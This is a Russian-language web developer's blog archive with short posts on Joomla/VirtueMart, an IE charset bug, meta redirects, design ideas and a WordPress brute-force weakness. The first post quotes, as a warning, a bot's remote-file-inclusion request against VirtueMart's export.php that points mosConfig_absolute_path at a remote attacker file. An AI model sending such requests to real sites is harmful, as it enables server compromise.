Archive for the 'Web' Category

Очередная дыра в Joomla-VirtueMart

Friday, April 10th, 2009

Может и не такая новая, но сейчас массово лезут боты в попытках найти уязвимую установку Joomla.
Делают так:
GET /any-your-dir/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://already-victim/badfile.txt??

» » »

VirtueMart: код для вывода товаров…

Tuesday, April 7th, 2009

код для вывода всех товаров списком ссылок

как развитие темы VirtueMart - шаблоны и ключевые места

Спасибо Kerch!
(more…)

» »

почему “лезет” шаблон в IE

Sunday, March 22nd, 2009

Обожаю Internet Explorer. В переносном смысле. Таких принципиальных и педантичных программ мне еще не встречалось.
верстаю 3х-колоночный шаблон. Простейший, с “резиновой” срединой. В FireFox и Opera все прекрасно, в IE (6.0) лезет, хоть тресни. Я ради этого даже через валидатор прогнал и html и css, все ошибки поубирал - все напрасно.
Через 2 дня обнаружил, что достаточно сменить в заголовке charset=UTF-8 на windows-1251 - и все работает!
Вспомнил анекдот в тему:

гаишник не знает, как придраться к водителю, и спрашиввает:
- Если у тя правое колесо спущено, какой подфарник мигать будет?
тот подумал-подумал, и отвечает:
- если тебе монтировкой по голове дать, на какую ногу хромать будешь?

Еще через полчаса нашлась причина: css был в отдельном файле, причем основной файл - utf-8, а css - Ansi. Из русского (т.е. мультибайтового) текста там были только комментарии, судя по всему от этого у IE и случилось несварение.

Ушел пить валерьянку.

» »

meta редирект

Wednesday, March 18th, 2009

Вечно забываю и путаю, как сделать рефреш (редирект) с помощью meta на новый адрес:
<META http-equiv=”refresh” content=”0;URL=http://new-url”>
тут 0 - число секунд. после которых происходит перенаправление

50 элегантных и приятных меню

Friday, February 6th, 2009

статья с очень хорошими примерами, как сделать красивое и легкое в использовании меню.

»

идеи для 404

Wednesday, September 24th, 2008

как оформить сообщение “страница не найдена” так, чтоб это было полезно для посетителя - идеи тут
Вдогонку: эта же страница на украинской Нокии (там 3 разных картинки (выбирается случайная), с девушкой прикольная)

Как выбрать движок для сайта

Thursday, August 28th, 2008

Попался очень интересный проект, который мог бы помочь мне, когда я искал галерею, каталог ссылок для себя, движок для своей конторы.

Знакомьтесь - opensourceCMS.com.

Этот проект создан с единственной целью: дать вам возможность попробовать некоторые из лучших существующих бесплатных и open source приложений.

.
Там более 100 (примерно, на глаз - не считал) вариантов всякой всячины - от порталов до вики-движков.
к каждому прилагается доступ в админку, логин-пароль.

Из минусов могу сказать - некоторые системы развернуты с ошибками, а также прошу учесть, что на том сайте только php/mysql (или без БД вообще) системы. При желании Вы найдете на этом сайте большой список систем, которые по тем или иным причинам сейчас не представлены.

ps: сам сайт opensourceCMS.com использует Joomla!
pps: если Вам помог этот пост - не забудьте поставить на него ссылку, когда сделаете свой сайт ;) Спасибо!

» » »

То, что вы не увидите в Google Maps

Tuesday, July 22nd, 2008

Неплохая, но наверняка неполная статья: “51 место, в которое вам не разрешено сунуть нос через Google Maps” :)

Еще можно посмотреть тут: “Белые пятна” на Google Maps
и в Википедии: Спутниковые карты с отсутствующими или недостоверными данными

еще одна уязвимость WordPress

Friday, April 25th, 2008

точнее, комбинация уязвимостей:

  • если в окне логина вводить неверный пароль, сообщение будет не таким, как если вводить неверный логин и пароль - что хоть и несущественно, но облегчает задачу для следующего:

  • WordPress абсолютно не устойчив против атак подбором пароля (Brute Force)
  • и имеет достаочно слабое шифрование паролей.

Так, при использовании Brute Force со скоростью 10 попыток в секунду, наихудшим (для взломщика) результатом будет чуть больше 19 дней.
Возможные варианты решений: закрывать вход дополнительно с помощью captcha и ограничением на скорость попыток ввода пароля.
Мое собственное решение: закрыть wp-admin с помошью .htaccess
Источник

40 идей для дизайна форм ввода

Friday, April 18th, 2008

Необычные, красивые, оригинальные, странные идеи для форм отзыва, комментария, подписки на новости, и всего прочего, что пожелает Ваша web-мастерская душа.
ps: если надо - могу перевести…но нужно ли это кому-то, кроме меня?;)

» » »